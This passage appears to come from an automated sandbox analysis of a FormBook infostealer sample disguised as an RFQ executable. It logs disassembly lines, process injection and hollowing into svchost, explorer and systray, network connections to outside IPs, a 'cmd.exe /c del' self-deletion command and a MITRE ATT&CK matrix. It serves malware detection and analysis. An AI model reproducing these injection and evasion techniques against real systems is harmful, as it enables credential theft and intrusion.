          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]2_2_030E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]2_2_030E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h]2_2_030DEBD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h]2_2_0305EBFC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h]2_2_030BCBF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h]2_2_030BCA11
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h]2_2_0306CA24
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h]2_2_0305EA2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]2_2_03054A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]2_2_03054A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h]2_2_0306CA38
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]2_2_03040A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]2_2_03040A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEA60 mov eax, dword ptr fs:[00000030h]2_2_030DEA60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]2_2_030ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]2_2_030ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h]2_2_03104A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h]2_2_03068A90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]2_2_03038AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]2_2_03038AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h]2_2_03086AA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h]2_2_03030AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]2_2_03064AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]2_2_03064AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]2_2_0306AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]2_2_0306AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]2_2_030AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]2_2_030AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h]2_2_030BC912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]2_2_03028918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]2_2_03028918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B892A mov eax, dword ptr fs:[00000030h]2_2_030B892A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C892B mov eax, dword ptr fs:[00000030h]2_2_030C892B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h]2_2_030B0946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104940 mov eax, dword ptr fs:[00000030h]2_2_03104940
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]2_2_0307096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov edx, dword ptr fs:[00000030h]2_2_0307096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]2_2_0307096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]2_2_030D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]2_2_030D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h]2_2_030BC97C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]2_2_030309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]2_2_030309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h]2_2_030B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]2_2_030B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]2_2_030B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h]2_2_030C69C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h]2_2_030649D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h]2_2_030FA9D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h]2_2_030BE9E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]2_2_030629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]2_2_030629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h]2_2_030BC810
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h]2_2_03052835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h]2_2_0306A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]2_2_030D483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]2_2_030D483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h]2_2_03042840
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_001381F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,1_2_001381F7
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0010A364 SetUnhandledExceptionFilter,1_2_0010A364
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0010A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0010A395
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_00671B93 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00671B93

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 76.223.105.230 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 80Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 3504Jump to behavior
          Source: C:\Windows\SysWOW64\systray.exeThread register set: target process: 3504Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\svchost.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Windows\SysWOW64\svchost.exeSection unmapped: C:\Windows\SysWOW64\systray.exe base address: 670000Jump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 311008Jump to behavior
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00138C93 LogonUserW,1_2_00138C93
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000E3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_000E3B4C
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000E4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_000E4A35
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00144EC9 mouse_event,1_2_00144EC9
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_001381F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,1_2_001381F7
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00144C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,1_2_00144C03
          Source: MKCC-MEC-RFQ-115-2024.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: explorer.exe, 00000003.00000002.3876685706.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1435132892.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: MKCC-MEC-RFQ-115-2024.exe, explorer.exe, 00000003.00000002.3876685706.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1435132892.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3881532572.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.3876685706.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1435132892.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.3876685706.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1435132892.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000002.3876113416.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1434848584.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanq
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0010886B cpuid 1_2_0010886B
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_001150D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_001150D7
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00122230 GetUserNameW,1_2_00122230
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0011418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,1_2_0011418A
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000E4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_000E4AFE

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: MKCC-MEC-RFQ-115-2024.exeBinary or memory string: WIN_81
          Source: MKCC-MEC-RFQ-115-2024.exeBinary or memory string: WIN_XP
          Source: MKCC-MEC-RFQ-115-2024.exeBinary or memory string: WIN_XPe
          Source: MKCC-MEC-RFQ-115-2024.exeBinary or memory string: WIN_VISTA
          Source: MKCC-MEC-RFQ-115-2024.exeBinary or memory string: WIN_7
          Source: MKCC-MEC-RFQ-115-2024.exeBinary or memory string: WIN_8
          Source: MKCC-MEC-RFQ-115-2024.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00156596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,1_2_00156596
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00156A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_00156A5A

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts          		2
          Native API          		1
          DLL Side-Loading          		1
          Exploitation for Privilege Escalation          		1
          Disable or Modify Tools          		21
          Input Capture          		2
          System Time Discovery          		Remote Services1
          Archive Collected Data          		2
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Shared Modules          		2
          Valid Accounts          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          Account Discovery          		Remote Desktop Protocol21
          Input Capture          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          Command and Scripting Interpreter          		Logon Script (Windows)2
          Valid Accounts          		3
          Obfuscated Files or Information          		Security Account Manager1
          File and Directory Discovery          		SMB/Windows Admin Shares3
          Clipboard Data          		2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
          Access Token Manipulation          		1
          DLL Side-Loading          		NTDS215
          System Information Discovery          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script612
          Process Injection          		2
          Valid Accounts          		LSA Secrets251
          Security Software Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Virtualization/Sandbox Evasion          		Cached Domain Credentials2
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
          Access Token Manipulation          		DCSync3
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job612
          Process Injection          		Proc Filesystem11
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
